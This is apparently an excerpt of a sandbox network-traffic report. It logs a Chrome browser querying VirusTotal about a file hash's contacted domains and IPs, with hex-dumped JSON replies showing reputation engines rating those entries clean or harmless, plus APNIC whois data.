                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1408INData Raw: 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 79 61 6e 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 43 79 61 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 75 6e 72 61 74 65 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: , "Cyan": { "method": "blacklist", "engine_name": "Cyan", "category": "undetected", "result": "unrated" },
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1280INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 45 6d 73 69 73 6f 66 74 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 45 6d 73 69 73 6f 66 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "result": "clean" }, "Emsisoft": { "method": "blacklist", "engine_name": "Emsisoft", "category": "harmless",
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1408INData Raw: 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 46 65 6f 64 6f 20 54 72 61 63 6b 65 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 46 65 6f 64 6f 20 54 72 61 63 6b 65 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: }, "Feodo Tracker": { "method": "blacklist", "engine_name": "Feodo Tracker", "category": "harmless", "result": "clean"


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    144192.168.2.164989674.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:29 UTC961OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_domains HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTgwOTUwMjgzNTktWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI4LjQ5Ng==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC886INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 576684b0743a5c29d485a6b21b0e3138
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:31 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 325943
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:31 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC522INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 61 63 63 6f 75 6e 74 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 64 6f 6d 61 69 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 64 6f 6d 61 69 6e 73 2f 61 63 63 6f 75 6e 74 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 61 74 74 72 69 62 75 74 65 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: { "data": [ { "id": "accounts.google.com", "type": "domain", "links": { "self": "https://www.virustotal.com/ui/domains/accounts.google.com" }, "attributes": {
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 30 78 53 49 5f 66 33 33 64 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 30 78 53 49 5f 66 33 33 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "result": "clean" }, "0xSI_f33d": { "method": "blacklist", "engine_name": "0xSI_f33d", "category": "undetected",
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC543INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 41 6c 69 65 6e 56 61 75 6c 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 61 6c 70 68 61 4d 6f 75 6e 74 61 69 6e 2e 61 69 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "engine_name": "AlienVault", "category": "harmless", "result": "clean" }, "alphaMountain.ai": { "method": "blacklist",
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC1408INData Raw: 41 6c 70 68 61 53 4f 43 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 75 6e 72 61 74 65 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 41 6e 74 69 79 2d 41 56 4c 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 41 6e 74 69 79
                                                                                                                                                                                                                    Data Ascii: AlphaSOC", "category": "undetected", "result": "unrated" }, "Antiy-AVL": { "method": "blacklist", "engine_name": "Antiy
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 42 69 74 44 65 66 65 6e 64 65 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 42 69 74 44 65 66 65 6e 64 65 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: }, "BitDefender": { "method": "blacklist", "engine_name": "BitDefender", "category": "harmless", "result": "clean"
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC1280INData Raw: 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 6c 75 73 74 65 72 32 35 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 43 6c 75 73 74 65 72 32 35 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f
                                                                                                                                                                                                                    Data Ascii: "category": "harmless", "result": "clean" }, "Cluster25": { "method": "blacklist", "engine_name": "Cluster25", "catego
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC1408INData Raw: 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 75 6e 72 61 74 65 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 79 62 6c 65 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 43 79 62 6c 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22
                                                                                                                                                                                                                    Data Ascii: : "undetected", "result": "unrated" }, "Cyble": { "method": "blacklist", "engine_name": "Cyble", "category": "harmless"
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC1408INData Raw: 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 45 53 54 73 65 63 75 72 69 74 79 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 45 53 54 73 65 63 75 72 69 74 79 22 2c 0a 20 20
                                                                                                                                                                                                                    Data Ascii: , "category": "harmless", "result": "clean" }, "ESTsecurity": { "method": "blacklist", "engine_name": "ESTsecurity",
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC1280INData Raw: 20 20 22 47 2d 44 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 47 2d 44 61 74 61 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 47 6f 6f 67 6c 65 20 53 61 66 65
                                                                                                                                                                                                                    Data Ascii: "G-Data": { "method": "blacklist", "engine_name": "G-Data", "category": "harmless", "result": "clean" }, "Google Safe
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC1408INData Raw: 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 49 50 73 75 6d 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 4a 75 6e 69 70 65 72 20 4e 65 74 77 6f 72 6b 73 22 3a 20 7b 0a 20 20 20
                                                                                                                                                                                                                    Data Ascii: { "method": "blacklist", "engine_name": "IPsum", "category": "harmless", "result": "clean" }, "Juniper Networks": {


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    145192.168.2.164989374.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:29 UTC957OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_ips HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTU4Nzg0MTA1NjYtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI4LjQ5Ng==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC886INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 1871ffe42ee737c9327ae35080d9c34d
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:30 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 270450
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:30 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC522INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 31 30 33 2e 33 35 2e 31 38 38 2e 39 38 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 69 70 5f 61 64 64 72 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 69 70 5f 61 64 64 72 65 73 73 65 73 2f 31 30 33 2e 33 35 2e 31 38 38 2e 39 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 61 74 74 72 69 62 75 74 65 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: { "data": [ { "id": "103.35.188.98", "type": "ip_address", "links": { "self": "https://www.virustotal.com/ui/ip_addresses/103.35.188.98" }, "attributes": {
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 6f 74 61 6c 5f 76 6f 74 65 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 68 61 72 6d 6c 65 73 73 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 61 6c 69 63 69 6f 75 73 22 3a 20 30 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 77 68 6f 69 73 22 3a 20 22 4e 65 74 52 61 6e 67 65 3a 20 31 30 33 2e 30 2e 30 2e 30 20 2d 20 31 30 33 2e 32 35 35 2e 32 35 35 2e 32 35 35 5c 6e 43 49 44 52 3a 20 31 30 33 2e 30 2e 30 2e 30 2f 38 5c 6e 4e 65 74 4e 61 6d 65 3a 20 41 50 4e 49 43 2d 31 30 33 5c 6e 4e 65 74 48 61 6e 64 6c 65 3a 20 4e 45 54 2d 31 30 33 2d 30 2d 30 2d 30 2d 31 5c 6e 50 61 72
                                                                                                                                                                                                                    Data Ascii: "total_votes": { "harmless": 0, "malicious": 0 }, "whois": "NetRange: 103.0.0.0 - 103.255.255.255\nCIDR: 103.0.0.0/8\nNetName: APNIC-103\nNetHandle: NET-103-0-0-0-1\nPar
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC546INData Raw: 73 6f 75 72 63 65 4c 69 6e 6b 3a 20 68 74 74 70 3a 2f 2f 77 71 2e 61 70 6e 69 63 2e 6e 65 74 2f 77 68 6f 69 73 2d 73 65 61 72 63 68 2f 73 74 61 74 69 63 2f 73 65 61 72 63 68 2e 68 74 6d 6c 5c 6e 4f 72 67 41 62 75 73 65 48 61 6e 64 6c 65 3a 20 41 57 43 31 32 2d 41 52 49 4e 5c 6e 4f 72 67 41 62 75 73 65 4e 61 6d 65 3a 20 41 50 4e 49 43 20 57 68 6f 69 73 20 43 6f 6e 74 61 63 74 5c 6e 4f 72 67 41 62 75 73 65 50 68 6f 6e 65 3a 20 2b 36 31 20 37 20 33 38 35 38 20 33 31 38 38 20 5c 6e 4f 72 67 41 62 75 73 65 45 6d 61 69 6c 3a 20 73 65 61 72 63 68 2d 61 70 6e 69 63 2d 6e 6f 74 2d 61 72 69 6e 40 61 70 6e 69 63 2e 6e 65 74 5c 6e 4f 72 67 41 62 75 73 65 52 65 66 3a 20 68 74 74 70 73 3a 2f 2f 72 64 61 70 2e 61 72 69 6e 2e 6e 65 74 2f 72 65 67 69 73 74 72 79 2f 65 6e
                                                                                                                                                                                                                    Data Ascii: sourceLink: http://wq.apnic.net/whois-search/static/search.html\nOrgAbuseHandle: AWC12-ARIN\nOrgAbuseName: APNIC Whois Contact\nOrgAbusePhone: +61 7 3858 3188 \nOrgAbuseEmail: search-apnic-not-arin@apnic.net\nOrgAbuseRef: https://rdap.arin.net/registry/en
